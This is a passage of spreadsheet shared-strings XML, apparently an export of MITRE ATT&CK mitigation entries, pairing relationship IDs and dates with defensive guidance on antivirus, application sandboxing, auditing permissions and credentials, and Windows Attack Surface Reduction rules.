    <t>Manage the access control list for "Replicating Directory Changes" and other permissions associated with domain controller replication.(Citation: ADSecurity Mimikatz DCSync)(Citation: Microsoft Replication ACL)</t>
  </si>
  <si>
    <t>relationship--7b641542-852b-47c0-a604-f13998adb892</t>
  </si>
  <si>
    <t>22 April 2021</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</si>
  <si>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</si>
  <si>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relationship--f6d6f916-ca2a-4c25-841f-02d71b31308c</t>
  </si>
  <si>
    <t>27 February 2020</t>
  </si>
  <si>
    <t>05 November 2020</t>
  </si>
  <si>
    <t>Remove vulnerable Group Policy Preferences.(Citation: Microsoft MS14-025)</t>
  </si>
  <si>
    <t>relationship--b3a191f3-59be-4457-ad5c-085ea0391bfe</t>
  </si>
  <si>
    <t>17 June 2020</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</si>
  <si>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</si>
  <si>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relationship--fc31837d-530f-45e5-b9f8-bf6268c3ef03</t>
  </si>
  <si>
    <t>17 July 2019</t>
  </si>
  <si>
    <t>20 July 2021</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</si>
  <si>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</si>
  <si>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relationship--918a7d67-faea-4a41-9ed3-e3558fca73db</t>
  </si>
  <si>
    <t>31 August 2021</t>
  </si>
  <si>
    <t>For containing the impact of a previously forged SAML token, rotate the token-signing AD FS certificate in rapid succession twice, which will invalidate any tokens generated using the previous certificate.(Citation: Mandiant Defend UNC2452 White Paper)</t>
  </si>
  <si>
    <t>relationship--3278a7a8-bf61-45bc-9553-872f222f699d</t>
  </si>
  <si>
    <t>20 September 2021</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</si>
  <si>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</si>
  <si>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relationship--2ebbb8a5-a5f2-495d-bdf3-c49701edb26b</t>
  </si>
  <si>
    <t>09 February 2021</t>
  </si>
  <si>
    <t>Ensure proper system and access isolation for critical network systems through use of group policy.</t>
  </si>
  <si>
    <t>relationship--147b8bb5-ca4e-455e-a5b9-f0ab118c67eb</t>
  </si>
  <si>
    <t>18 July 2019</t>
  </si>
  <si>
    <t>11 December 2020</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</si>
  <si>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</si>
  <si>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relationship--35228466-b834-474f-8657-a3492a3579b6</t>
  </si>
  <si>
    <t>relationship--037b851b-7ced-4322-a57a-9f744f9a1e76</t>
  </si>
  <si>
    <t>28 February 2020</t>
  </si>
  <si>
    <t>08 March 2022</t>
  </si>
  <si>
    <t>relationship--2b36db33-4f97-4228-bcca-4f453d1bd533</t>
  </si>
  <si>
    <t>16 March 2021</t>
  </si>
  <si>
    <t>Disable legacy authentication, which does not support MFA, and require the use of modern authentication protocols instead.</t>
  </si>
  <si>
    <t>relationship--eed29e0f-59c1-4fab-8268-3f0571e90748</t>
  </si>
  <si>
    <t>M1049</t>
  </si>
  <si>
    <t>Antivirus/Antimalware</t>
  </si>
  <si>
    <t>course-of-action--a6a47a06-08fc-4ec4-bdc3-20373375ebb9</t>
  </si>
  <si>
    <t xml:space="preserve">Consider utilizing the Antimalware Scan Interface (AMSI) on Windows 10+ to analyze commands after being processed/interpreted. </t>
  </si>
  <si>
    <t>relationship--f12b1234-4eb8-4b3d-8b84-50df8dfa8df9</t>
  </si>
  <si>
    <t xml:space="preserve">Anti-virus can be used to automatically quarantine suspicious files. </t>
  </si>
  <si>
    <t>relationship--8d56622d-547a-4daa-89b8-1c555d1ac5b7</t>
  </si>
  <si>
    <t>27 March 2022</t>
  </si>
  <si>
    <t>Anti-virus can be used to automatically detect and quarantine suspicious files.</t>
  </si>
  <si>
    <t>relationship--2ee0c642-94af-491c-bc65-821e13586bca</t>
  </si>
  <si>
    <t>Common tools for detecting Linux rootkits include: rkhunter (Citation: SourceForge rkhunter), chrootkit (Citation: Chkrootkit Main), although rootkits may be designed to evade certain detection tools.</t>
  </si>
  <si>
    <t>relationship--9fa87ff9-ee4a-4660-8cd8-b2b3da820b1f</t>
  </si>
  <si>
    <t>31 March 2022</t>
  </si>
  <si>
    <t>Use signatures or heuristics to detect malicious LNK and subsequently downloaded files.</t>
  </si>
  <si>
    <t>relationship--668b73fd-0b71-49a5-a756-5213c0bcf6d5</t>
  </si>
  <si>
    <t>relationship--1596b872-504f-41f2-b9e4-918c795f0050</t>
  </si>
  <si>
    <t>Anti-virus can be used to automatically quarantine suspicious files.</t>
  </si>
  <si>
    <t>relationship--dc595175-bd4d-4409-829b-43c42b762647</t>
  </si>
  <si>
    <t>Anti-virus can be used to automatically detect and quarantine suspicious files. Consider utilizing the Antimalware Scan Interface (AMSI) on Windows 10+ to analyze commands after being processed/interpreted. (Citation: Microsoft AMSI June 2015)</t>
  </si>
  <si>
    <t>relationship--ffa8f46b-615f-4b95-8ed5-90f86eaedd20</t>
  </si>
  <si>
    <t>25 June 2019</t>
  </si>
  <si>
    <t>Anti-virus can automatically quarantine suspicious files.</t>
  </si>
  <si>
    <t>relationship--ed821f5e-9527-4fbb-ae76-37a79592dfb6</t>
  </si>
  <si>
    <t>27 September 2021</t>
  </si>
  <si>
    <t>relationship--758cbc32-6b33-4012-8622-cd7d218a799c</t>
  </si>
  <si>
    <t>24 January 2022</t>
  </si>
  <si>
    <t>relationship--70b511c9-5a2c-4810-87b6-73dfc648ec29</t>
  </si>
  <si>
    <t>26 July 2021</t>
  </si>
  <si>
    <t xml:space="preserve">Employ heuristic-based malware detection. Ensure updated virus definitions and create custom signatures for observed malware. </t>
  </si>
  <si>
    <t>relationship--a44728b1-9cb4-4307-8c4c-37b5acba536e</t>
  </si>
  <si>
    <t>11 March 2022</t>
  </si>
  <si>
    <t>Anti-virus can also automatically quarantine suspicious files.</t>
  </si>
  <si>
    <t>relationship--26d24472-ae04-46e7-9166-5d8a8f6f16f7</t>
  </si>
  <si>
    <t>18 October 2021</t>
  </si>
  <si>
    <t>relationship--6c1c0c1e-91fb-4285-9656-8d452e630fb3</t>
  </si>
  <si>
    <t>18 October 2020</t>
  </si>
  <si>
    <t>Anti-virus can be used to automatically quarantine suspicious files.(Citation: Mandiant Cloudy Logs 2023)</t>
  </si>
  <si>
    <t>relationship--a2bda2c9-b4cb-4a4c-9fce-f8efbab38fa6</t>
  </si>
  <si>
    <t>Network/Host intrusion prevention systems, antivirus, and detonation chambers can be employed to prevent documents from fetching and/or executing malicious payloads.(Citation: Anomali Template Injection MAR 2018)</t>
  </si>
  <si>
    <t>relationship--2357634d-3e93-41f3-90d5-91fe4d0deb7e</t>
  </si>
  <si>
    <t>12 January 2022</t>
  </si>
  <si>
    <t>relationship--1461fa53-bc4f-4ae5-b131-3f6058e6a72a</t>
  </si>
  <si>
    <t>07 March 2022</t>
  </si>
  <si>
    <t>M1013</t>
  </si>
  <si>
    <t>Application Developer Guidance</t>
  </si>
  <si>
    <t>course-of-action--25dc1ce8-eb55-4333-ae30-a7cb4f5894a1</t>
  </si>
  <si>
    <t>attack-pattern--70910fbd-58dc-4c1c-8c48-814d11fcd022</t>
  </si>
  <si>
    <t>Application developers uploading to public code repositories should be careful to avoid publishing sensitive information such as credentials and API keys.</t>
  </si>
  <si>
    <t>relationship--aae309ee-9d15-4188-8f74-68c581a3a720</t>
  </si>
  <si>
    <t>When possible, include hash values in manifest files to help prevent side-loading of malicious libraries.(Citation: FireEye DLL Side-Loading)</t>
  </si>
  <si>
    <t>relationship--debfc37d-448d-497a-8cef-2c7ada3883d1</t>
  </si>
  <si>
    <t>26 April 2021</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</si>
  <si>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</si>
  <si>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relationship--6de628ac-2f5b-4563-8f54-c5243109221e</t>
  </si>
  <si>
    <t>relationship--4f806196-7c20-4923-ae01-8f0f7f27a4a7</t>
  </si>
  <si>
    <t>09 March 2022</t>
  </si>
  <si>
    <t xml:space="preserve">Enable the Hardened Runtime capability when developing applications. Do not include the &lt;code&gt;com.apple.security.get-task-allow&lt;/code&gt; entitlement with the value set to any variation of true. </t>
  </si>
  <si>
    <t>relationship--f60e5a0d-cfdf-4c4e-be35-af5a2bdbc131</t>
  </si>
  <si>
    <t>Ensure applications are using Apple's developer guidance which enables hardened runtime.(Citation: Apple Developer Doco Hardened Runtime)</t>
  </si>
  <si>
    <t>relationship--3c5b3ca4-af5a-47dd-8dd4-57d2a690c2a9</t>
  </si>
  <si>
    <t xml:space="preserve">Configure applications to use the application bundle structure which leverages the &lt;code&gt;/Resources&lt;/code&gt; folder location.(Citation: Apple App Security Overview) </t>
  </si>
  <si>
    <t>relationship--da7b2203-dade-4ec0-85a5-dada9409ae2f</t>
  </si>
  <si>
    <t>13 October 2021</t>
  </si>
  <si>
    <t>16 October 2021</t>
  </si>
  <si>
    <t>attack-pattern--a0e6614a-7740-4b24-bd65-f1bde09fc365</t>
  </si>
  <si>
    <t>relationship--f0c57085-ccd9-48d1-b35d-1b0f1ba80e96</t>
  </si>
  <si>
    <t>Ensure that applications do not store sensitive data or credentials insecurely. (e.g. plaintext credentials in code, published credentials in repositories, or credentials in public cloud storage).</t>
  </si>
  <si>
    <t>relationship--c8acdf40-8237-487f-8255-91afa327705d</t>
  </si>
  <si>
    <t>10 October 2019</t>
  </si>
  <si>
    <t>relationship--9e753c36-66d8-4f48-8b06-fbb9fdc92f76</t>
  </si>
  <si>
    <t>15 October 2021</t>
  </si>
  <si>
    <t>M1048</t>
  </si>
  <si>
    <t>Application Isolation and Sandboxing</t>
  </si>
  <si>
    <t>course-of-action--b9f0c069-abbe-4a07-a245-2481219a1463</t>
  </si>
  <si>
    <t>Ensure all COM alerts and Protected View are enabled.(Citation: Microsoft Protected View)</t>
  </si>
  <si>
    <t>relationship--7b0c5b20-7c34-4939-a790-97853919b5dc</t>
  </si>
  <si>
    <t>relationship--7566cba1-7be8-4647-b0ab-2991fcde2abf</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</si>
  <si>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</si>
  <si>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relationship--56f490de-51e8-47c4-9eae-ecdd1a55e6ef</t>
  </si>
  <si>
    <t>24 June 2019</t>
  </si>
  <si>
    <t>Ensure Protected View is enabled.(Citation: Microsoft Protected View)</t>
  </si>
  <si>
    <t>relationship--95966f14-9a22-42ab-910d-80f108dd08de</t>
  </si>
  <si>
    <t>22 February 2022</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</si>
  <si>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</si>
  <si>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relationship--3d5d727d-fa37-4de4-9d31-d8e497c910de</t>
  </si>
  <si>
    <t>Application isolation will limit what other processes and system features the exploited target can access.</t>
  </si>
  <si>
    <t>relationship--0c8fdb59-a28f-4f8f-a788-9e3e8928c6d5</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</si>
  <si>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</si>
  <si>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relationship--d48a5068-7796-4c66-9ddf-eb6e8aaf6887</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</si>
  <si>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</si>
  <si>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relationship--e5c4842c-e1be-48c3-9007-a3c283515f86</t>
  </si>
  <si>
    <t>25 March 2020</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</si>
  <si>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</si>
  <si>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relationship--eb812961-ecb7-4361-82c4-fb52fa93c80b</t>
  </si>
  <si>
    <t>29 March 2020</t>
  </si>
  <si>
    <t>relationship--5edeca3e-96aa-45e6-b99b-044e25cb3245</t>
  </si>
  <si>
    <t>relationship--9492b31f-9275-4ee5-84bd-040cf653a6db</t>
  </si>
  <si>
    <t>24 February 2022</t>
  </si>
  <si>
    <t xml:space="preserve">Browser sandboxes can be used to mitigate some of the impact of exploitation, but sandbox escapes may still exist. 
</t>
  </si>
  <si>
    <t>relationship--15e815c2-ab92-4490-b0ba-f94dddfe8b01</t>
  </si>
  <si>
    <t>relationship--73c6ad27-074a-437d-82ec-39592b783160</t>
  </si>
  <si>
    <t>M1047</t>
  </si>
  <si>
    <t>Audit</t>
  </si>
  <si>
    <t>course-of-action--cc2399fd-3cd3-4319-8d0a-fbd6420cdaf8</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</si>
  <si>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</si>
  <si>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relationship--3de2faf5-8019-4aad-a317-fb66554cd2c0</t>
  </si>
  <si>
    <t>Check for common UAC bypass weaknesses on Windows systems to be aware of the risk posture and address issues where appropriate.(Citation: Github UACMe)</t>
  </si>
  <si>
    <t>relationship--94d71c18-e2af-4dfd-aa2f-28ca68a772ab</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</si>
  <si>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</si>
  <si>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relationship--86f6ea64-eb95-4228-956f-eae82b8f49d8</t>
  </si>
  <si>
    <t>System scans can be performed to identify unauthorized archival utilities.</t>
  </si>
  <si>
    <t>relationship--9e0cc38c-17a0-4320-b9b4-dc8458a9bb79</t>
  </si>
  <si>
    <t>21 October 2020</t>
  </si>
  <si>
    <t>relationship--9448e565-a9ea-44c2-9c03-8f6112cd7d1d</t>
  </si>
  <si>
    <t>04 January 2022</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</si>
  <si>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</si>
  <si>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relationship--3e76b11e-8a9e-4300-b9d4-8cbd8e8bb37f</t>
  </si>
  <si>
    <t xml:space="preserve"> Ensure extensions that are installed are the intended ones as many malicious extensions will masquerade as legitimate ones.</t>
  </si>
  <si>
    <t>relationship--0e686457-461d-496b-b838-dc8ca57a9f32</t>
  </si>
  <si>
    <t>27 April 2021</t>
  </si>
  <si>
    <t>Audit images deployed within the environment to ensure they do not contain any malicious components.</t>
  </si>
  <si>
    <t>relationship--bc02a307-04c7-4b8e-ab91-bf8ca261420e</t>
  </si>
  <si>
    <t>relationship--3bc57dac-c8b3-4d6d-8f4c-3e7d515cdf87</t>
  </si>
  <si>
    <t>06 January 2022</t>
  </si>
  <si>
    <t xml:space="preserve">Preemptively search through communication services to find shared unsecured credentials. Searching for common patterns like "&lt;code&gt;password is &lt;/code&gt;", “&lt;code&gt;password=&lt;/code&gt;” and take actions to reduce exposure when found. </t>
  </si>
  <si>
    <t>relationship--7494c5ff-db1c-4bba-8ec0-8a6678b28900</t>
  </si>
  <si>
    <t>In an Exchange environment, Administrators can use `Get-TransportRule` / `Remove-TransportRule` to discover and remove potentially malicious transport rules.(Citation: Microsoft Manage Mail Flow Rules 2023)</t>
  </si>
  <si>
    <t>relationship--80e1e1e0-a60e-4ba6-a19a-4bc7a94f1cc6</t>
  </si>
  <si>
    <t>Routinely check user permissions to ensure only the expected users have the ability to list IAM identities or otherwise discover cloud accounts.</t>
  </si>
  <si>
    <t>relationship--8b9e5b99-2df6-47b4-9c97-9bf8dd01821d</t>
  </si>
  <si>
    <t>11 August 2020</t>
  </si>
  <si>
    <t>Scan public code repositories for exposed credentials or other sensitive information before making commits. Ensure that any leaked credentials are removed from the commit history, not just the current latest version of the code.</t>
  </si>
  <si>
    <t>relationship--fea72867-7ceb-4545-b138-1cef9cac24ba</t>
  </si>
  <si>
    <t>Consider periodic reviews of accounts and privileges for critical and sensitive code repositories. Scan code repositories for exposed credentials or other sensitive information.</t>
  </si>
  <si>
    <t>relationship--99e7e929-1e72-4d9a-8997-15f977f36218</t>
  </si>
  <si>
    <t>Consider periodic review of accounts and privileges for critical and sensitive Confluence repositories.</t>
  </si>
  <si>
    <t>relationship--579ff596-a4eb-486f-878e-2f8434611d00</t>
  </si>
  <si>
    <t>08 June 2021</t>
  </si>
  <si>
    <t>Routinely check user permissions to ensure only the expected users have the capability to create new instances.</t>
  </si>
  <si>
    <t>relationship--ac440832-cb04-409e-87fa-558097a898b6</t>
  </si>
  <si>
    <t>12 June 2020</t>
  </si>
  <si>
    <t>18 June 2020</t>
  </si>
  <si>
    <t>Routinely check user permissions to ensure only the expected users have the capability to create snapshots and backups.</t>
  </si>
  <si>
    <t>relationship--6f8f4546-9e1c-42c9-b76f-863e51d6cb2a</t>
  </si>
  <si>
    <t>Use auditing tools capable of detecting privilege and service abuse opportunities on systems within an enterprise and correct them.</t>
  </si>
  <si>
    <t>relationship--65b98884-b04d-424a-a89c-c4f52565e160</t>
  </si>
  <si>
    <t>Preemptively search for files containing passwords and take actions to reduce the exposure risk when found.</t>
  </si>
  <si>
    <t>relationship--dac6c0a0-9eba-41b5-95c1-2f340d12b175</t>
  </si>
  <si>
    <t>12 April 2021</t>
  </si>
  <si>
    <t>Proactively search for credentials within the Registry and attempt to remediate the risk.</t>
  </si>
  <si>
    <t>relationship--9c4bd197-08a2-4ded-baba-bd70b6b4afd0</t>
  </si>
  <si>
    <t>07 February 2020</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</si>
  <si>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</si>
  <si>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relationship--06287ae2-325c-448e-8790-3c37492e1c29</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</si>
  <si>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</si>
  <si>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relationship--b673ba9b-3eb4-42fd-976d-62fc8d121cc3</t>
  </si>
  <si>
    <t>Frequently check permissions on cloud storage to ensure proper permissions are set to deny open or unprivileged access to resources.(Citation: Amazon S3 Security, 2019)</t>
  </si>
  <si>
    <t>relationship--e3e50d39-fa69-4fca-9353-259247dbd439</t>
  </si>
  <si>
    <t>05 October 2019</t>
  </si>
  <si>
    <t>09 July 2020</t>
  </si>
  <si>
    <t>Consider periodic review of accounts and privileges for critical and sensitive repositories.</t>
  </si>
  <si>
    <t>relationship--eacf09ab-0264-4af8-bfa5-f3be9df47e3f</t>
  </si>
  <si>
    <t>20 June 2019</t>
  </si>
  <si>
    <t>Routinely check user permissions to ensure only the expected users have the capability to delete new instances.</t>
  </si>
  <si>
    <t>relationship--ba3d7819-9e07-4d90-93f1-e5fe9c63201f</t>
  </si>
  <si>
    <t>14 September 2020</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</si>
  <si>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</si>
  <si>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relationship--4eda0bd3-66e3-4773-9616-78ab8f60cbd5</t>
  </si>
  <si>
    <t>Consider periodic review of &lt;code&gt;auditpol&lt;/code&gt; settings for Administrator accounts and perform dynamic baselining on SIEM(s) to investigate potential malicious activity. Also ensure that the EventLog service and its threads are properly running.</t>
  </si>
  <si>
    <t>relationship--a1844dc2-a809-4413-8509-e8d4b54882a5</t>
  </si>
  <si>
    <t>04 October 2021</t>
  </si>
  <si>
    <t>19 October 2021</t>
  </si>
  <si>
    <t xml:space="preserve">Routinely check account role permissions to ensure only expected users and roles have permission to modify cloud firewalls. </t>
  </si>
  <si>
    <t>relationship--9bb5eb8e-b05c-4890-a5aa-6c038b61d5d7</t>
  </si>
  <si>
    <t>07 July 2020</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</si>
  <si>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</si>
  <si>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relationship--643e6783-2fee-4975-b945-77cd0bb55f41</t>
  </si>
  <si>
    <t>Routinely check account role permissions to ensure only expected users and roles have permission to modify system firewalls.</t>
  </si>
  <si>
    <t>relationship--aed677d9-a79f-4448-b6a9-3df4d647730b</t>
  </si>
  <si>
    <t>30 January 2023</t>
  </si>
  <si>
    <t>Identify and correct GPO permissions abuse opportunities (ex: GPO modification privileges) using auditing tools such as [BloodHound](https://attack.mitre.org/software/S0521) (version 1.5.1 and later)(Citation: GitHub Bloodhound).</t>
  </si>
  <si>
    <t>relationship--02a7cdce-3386-4a5f-a9c4-a8ab2d3a9091</t>
  </si>
  <si>
    <t>11 January 2021</t>
  </si>
  <si>
    <t>Map the trusts within existing domains/forests and keep trust relationships to a minimum.</t>
  </si>
  <si>
    <t>relationship--047e6dc3-d213-4d97-8573-9c8da28a0742</t>
  </si>
  <si>
    <t>26 March 2020</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</si>
  <si>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</si>
  <si>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relationship--d60b92c6-2030-4802-8d7d-868ff15f3b0c</t>
  </si>
  <si>
    <t>03 October 2019</t>
  </si>
  <si>
    <t>14 October 2021</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</si>
  <si>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</si>
  <si>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relationship--cd1a91ea-4b59-4352-b902-941fbec64f29</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</si>
  <si>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</si>
  <si>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relationship--3b2ca38e-351d-4595-8ddb-17b648f196ef</t>
  </si>
  <si>
    <t>10 June 2021</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</si>
  <si>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</si>
  <si>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relationship--09838bf8-4d67-4d21-b44e-ec5786182cc9</t>
  </si>
  <si>
    <t>Consider periodic review of common fileless storage locations (such as the Registry or WMI repository) to potentially identify abnormal and malicious data.</t>
  </si>
  <si>
    <t>relationship--3de96229-d45b-47b2-9515-4eadd0023115</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</si>
  <si>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</si>
  <si>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relationship--da4b552e-fae2-42ef-ac2f-9b61e6ff365a</t>
  </si>
  <si>
    <t>Identify and correct GPO permissions abuse opportunities (ex: GPO modification privileges) using auditing tools such as [BloodHound](https://attack.mitre.org/software/S0521) (version 1.5.1 and later).(Citation: GitHub Bloodhound)</t>
  </si>
  <si>
    <t>relationship--19e387c4-0dd8-4c00-9195-73ed25ad061e</t>
  </si>
  <si>
    <t>Search SYSVOL for any existing GGPs that may contain credentials and remove them.(Citation: ADSecurity Finding Passwords in SYSVOL)</t>
  </si>
  <si>
    <t>relationship--4abb5175-7caf-41c8-83a6-1ce459cf72df</t>
  </si>
  <si>
    <t>17 February 2020</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</si>
  <si>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</si>
  <si>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relationship--4cc78773-df9f-40d8-a2e5-eb2eadb05409</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</si>
  <si>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</si>
  <si>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relationship--a5cca5a1-35c5-4e96-a343-3e2c81a0a202</t>
  </si>
  <si>
    <t>Regularly check installed IIS components to verify the integrity of the web server and identify if unexpected changes have been made.</t>
  </si>
  <si>
    <t>relationship--9f93da44-6aa1-4f59-95c7-89c849423da9</t>
  </si>
  <si>
    <t>17 June 2021</t>
  </si>
  <si>
    <t>Routinely check account role permissions to ensure only expected users and roles have permission to modify defensive tools and settings.</t>
  </si>
  <si>
    <t>relationship--c6330aef-b396-4664-9258-a6bed2f4573e</t>
  </si>
  <si>
    <t>Periodically check the integrity of images and containers used in cloud deployments to ensure they have not been modified to include malicious software.</t>
  </si>
  <si>
    <t>relationship--f7a8b397-ecf3-456e-a395-568a41048609</t>
  </si>
  <si>
    <t>Binaries can also be baselined for what dynamic libraries they require, and if an app requires a new dynamic library that wasn\u2019t included as part of an update, it should be investigated.</t>
  </si>
  <si>
    <t>relationship--60ee4eba-cd3c-4558-aeba-0c5551f20dae</t>
  </si>
  <si>
    <t>24 March 2020</t>
  </si>
  <si>
    <t>Use auditing tools capable of detecting folder permissions abuse opportunities on systems, especially reviewing changes made to folders by third-party software.</t>
  </si>
  <si>
    <t>relationship--e76db224-a9a8-4a7a-8d0c-d64979087e73</t>
  </si>
  <si>
    <t>07 October 2021</t>
  </si>
  <si>
    <t>relationship--b7f0b1ab-3a14-4944-aee0-8abdb24707c6</t>
  </si>
  <si>
    <t>26 August 2021</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</si>
  <si>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</si>
  <si>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relationship--f06c48f0-88de-4850-90dd-9ff4979dde95</t>
  </si>
  <si>
    <t>Routinely monitor user permissions to ensure only the expected users have the capability to request quota adjustments or modify tenant-level compute settings.</t>
  </si>
  <si>
    <t>relationship--9a99712e-ea3c-47f7-a2f6-6109b9d0d4c3</t>
  </si>
  <si>
    <t>Routinely monitor user permissions to ensure only the expected users have the capability to modify cloud compute infrastructure components.</t>
  </si>
  <si>
    <t>relationship--91c4630e-772b-4dac-8e58-5a899ccdc2be</t>
  </si>
  <si>
    <t>27 April 2020</t>
  </si>
  <si>
    <t>20 April 2021</t>
  </si>
  <si>
    <t>Review MFA actions alongside authentication logs to ensure that MFA-based logins are functioning as intended. Review user accounts to ensure that all accounts have MFA enabled.(Citation: Mandiant Cloudy Logs 2023)</t>
  </si>
  <si>
    <t>relationship--90d0d818-4a80-459c-9d57-ca9221eae57b</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</si>
  <si>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</si>
  <si>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relationship--6b8bbbca-a50e-49fa-a851-f43a8c21f635</t>
  </si>
  <si>
    <t>relationship--9f42ded2-e291-4856-91ab-cf5ff8be461a</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</si>
  <si>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</si>
  <si>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relationship--cc783e55-3b37-45df-89a8-ec098a2ccea2</t>
  </si>
  <si>
    <t>16 September 2020</t>
  </si>
  <si>
    <t>relationship--ae13555e-3275-43c5-b388-59478160d01b</t>
  </si>
  <si>
    <t>relationship--2d0b7e52-9c7a-47dd-ab12-4dc6942f49f1</t>
  </si>
  <si>
    <t>Periodically inspect systems for abnormal and unexpected power settings that may indicate malicious activty.</t>
  </si>
  <si>
    <t>relationship--c9ca3f00-925f-4bce-9aeb-df41fb9b5eb0</t>
  </si>
  <si>
    <t>Ensure only authorized keys are allowed access to critical resources and audit access lists regularly.</t>
  </si>
  <si>
    <t>relationship--ed609ca1-8646-4827-9d1a-aad365de95f6</t>
  </si>
  <si>
    <t>Inventory systems for unauthorized Python installations.</t>
  </si>
  <si>
    <t>relationship--03b2c5b8-aeca-4232-a206-521b83d56c54</t>
  </si>
  <si>
    <t>Audit the Remote Desktop Users group membership regularly. Remove unnecessary accounts and groups from Remote Desktop Users groups.</t>
  </si>
  <si>
    <t>relationship--6b9e7925-876a-49b1-8b42-e789401f2fad</t>
  </si>
  <si>
    <t>23 March 2020</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</si>
  <si>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</si>
  <si>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relationship--b2ac3f9c-b43a-417f-8f9f-0c86bee2e219</t>
  </si>
  <si>
    <t>22 October 2020</t>
  </si>
  <si>
    <t>relationship--36e86ea2-e0d4-4ade-bae8-212a78c8d569</t>
  </si>
  <si>
    <t>Enable advanced auditing on AD FS. Check the success and failure audit options in the AD FS Management snap-in. Enable Audit Application Generated events on the AD FS farm via Group Policy Object.(Citation: FireEye ADFS)</t>
  </si>
  <si>
    <t>relationship--8a716922-181e-409c-b112-851e7f172d7c</t>
  </si>
  <si>
    <t xml:space="preserve">Regularly check component software on critical services that adversaries may target for persistence to verify the integrity of the systems and identify if unexpected changes have been made. </t>
  </si>
  <si>
    <t>relationship--1c97ecdd-5195-4242-9007-380cc46ef384</t>
  </si>
  <si>
    <t>30 December 2019</t>
  </si>
  <si>
    <t>Toolkits like the PowerSploit framework contain PowerUp modules that can be used to explore systems for permission weaknesses in scheduled tasks that could be used to escalate privileges. (Citation: Powersploit)</t>
  </si>
  <si>
    <t>relationship--b562272b-db14-45e4-8ff2-3eafb2db5179</t>
  </si>
  <si>
    <t>30 December 2020</t>
  </si>
  <si>
    <t>relationship--9d4e8b44-90f8-4a10-8419-8187d4babf24</t>
  </si>
  <si>
    <t>19 July 2019</t>
  </si>
  <si>
    <t>relationship--e8ba13f3-b51a-4e7b-9534-7f9f8d362b0c</t>
  </si>
  <si>
    <t>Regularly check component software on critical services that adversaries may target for persistence to verify the integrity of the systems and identify if unexpected changes have been made.</t>
  </si>
  <si>
    <t>relationship--1071d72e-9ea8-43df-8e82-2831fe0652b7</t>
  </si>
  <si>
    <t>27 September 2019</t>
  </si>
  <si>
    <t>relationship--9d4f0626-8d26-4187-a80b-df1467ce2dbb</t>
  </si>
  <si>
    <t>Consider periodic review of accounts and privileges for critical and sensitive SharePoint repositories.</t>
  </si>
  <si>
    <t>relationship--69e06021-a60c-49ac-840a-47ae154dbba8</t>
  </si>
  <si>
    <t>Audit applications and their permissions to ensure access to data and resources are limited based upon necessity and principle of least privilege.</t>
  </si>
  <si>
    <t>relationship--5f90f8ec-9154-4f28-a632-fd4024e6fbce</t>
  </si>
  <si>
    <t>13 December 2021</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</si>
  <si>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</si>
  <si>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relationship--4b5948b4-eba5-4af6-93d1-71b109167f62</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</si>
  <si>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</si>
  <si>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relationship--d3a4a83f-fac1-4e28-b1e8-183aabffaa34</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</si>
  <si>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</si>
  <si>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relationship--f0488c32-f937-4eb9-8068-092795872582</t>
  </si>
  <si>
    <t>relationship--0b6d433f-6908-4226-bda8-39ac6dac0bcc</t>
  </si>
  <si>
    <t>relationship--c8e8a6c2-5685-4ef6-a080-714482262ac5</t>
  </si>
  <si>
    <t>Preemptively search for files containing passwords or other credentials and take actions to reduce the exposure risk when found.</t>
  </si>
  <si>
    <t>relationship--abe43d10-714a-4f29-b164-d7cadd83cb61</t>
  </si>
  <si>
    <t>Inventory workstations for unauthorized VNC server software.</t>
  </si>
  <si>
    <t>relationship--703ea9d2-9caf-4753-8485-d12a0e9a2817</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</si>
  <si>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</si>
  <si>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relationship--5208729f-fc13-477a-984b-1035c581ad02</t>
  </si>
  <si>
    <t xml:space="preserve">Use auditing tools capable of detecting privilege and service abuse opportunities on systems within an enterprise and correct them. </t>
  </si>
  <si>
    <t>relationship--40f51fdc-cd3c-4e93-9593-e1ee7cf2211e</t>
  </si>
  <si>
    <t>M1040</t>
  </si>
  <si>
    <t>Behavior Prevention on Endpoint</t>
  </si>
  <si>
    <t>course-of-action--90f39ee1-d5a3-4aaa-9f28-3b42815b0d46</t>
  </si>
  <si>
    <t>On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent Office applications from creating child processes and from writing potentially malicious executable content to disk. (Citation: win10_asr)</t>
  </si>
  <si>
    <t>relationship--1d97864c-3e73-48ac-9ddd-83743ee62be6</t>
  </si>
  <si>
    <t>07 July 2021</t>
  </si>
  <si>
    <t xml:space="preserve">Some endpoint security solutions can be configured to block some types of process injection based on common sequences of behavior that occur during the injection process. </t>
  </si>
  <si>
    <t>relationship--1016e15c-64ed-4338-9ca9-83ffae3beb82</t>
  </si>
  <si>
    <t>On Windows 10+, enable Attack Surface Reduction (ASR) rules to block execution of potentially obfuscated scripts.(Citation: Microsoft ASR Obfuscation)</t>
  </si>
  <si>
    <t>relationship--24db980d-90c2-4934-838c-92209ae110f7</t>
  </si>
  <si>
    <t>On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent [Visual Basic](https://attack.mitre.org/techniques/T1059/005) and [JavaScript](https://attack.mitre.org/techniques/T1059/007) scripts from executing potentially malicious downloaded content (Citation: win10_asr).</t>
  </si>
  <si>
    <t>relationship--e93059c7-2f60-47f5-af11-bc0a6e7e6d25</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</si>
  <si>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</si>
  <si>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relationship--3633dab7-324d-4726-af7c-226022996785</t>
  </si>
  <si>
    <t>On Windows 10, enable cloud-delivered protection and Attack Surface Reduction (ASR) rules to block the execution of files that resemble ransomware. (Citation: win10_asr)</t>
  </si>
  <si>
    <t>relationship--9c8dee77-e751-40b6-ab99-ccfe6a832e0a</t>
  </si>
  <si>
    <t>06 July 2021</t>
  </si>
  <si>
    <t>Some endpoint security solutions can be configured to block some types of behaviors related to efforts by an adversary to create backups, such as command execution or preventing API calls to backup related services.</t>
  </si>
  <si>
    <t>relationship--c3f09021-8932-4433-ad02-a6b7c07b627d</t>
  </si>
  <si>
    <t>On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent DDE attacks and spawning of child processes from Office programs.(Citation: Microsoft ASR Nov 2017)(Citation: Enigma Reviving DDE Jan 2018)</t>
  </si>
  <si>
    <t>relationship--38482de7-5eb7-4baf-9007-2e1a6efe9622</t>
  </si>
  <si>
    <t>relationship--f8b6eae9-cf2b-4b16-8c44-03d989533dd6</t>
  </si>
  <si>
    <t>On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent execution of potentially obfuscated scripts.(Citation: win10_asr)</t>
  </si>
  <si>
    <t>relationship--ce044795-c25e-44ba-8b23-d6a2173e9000</t>
  </si>
  <si>
    <t>relationship--8dfddd1a-dd5f-461f-86ce-ba1fd557a397</t>
  </si>
  <si>
    <t>20 June 2020</t>
  </si>
  <si>
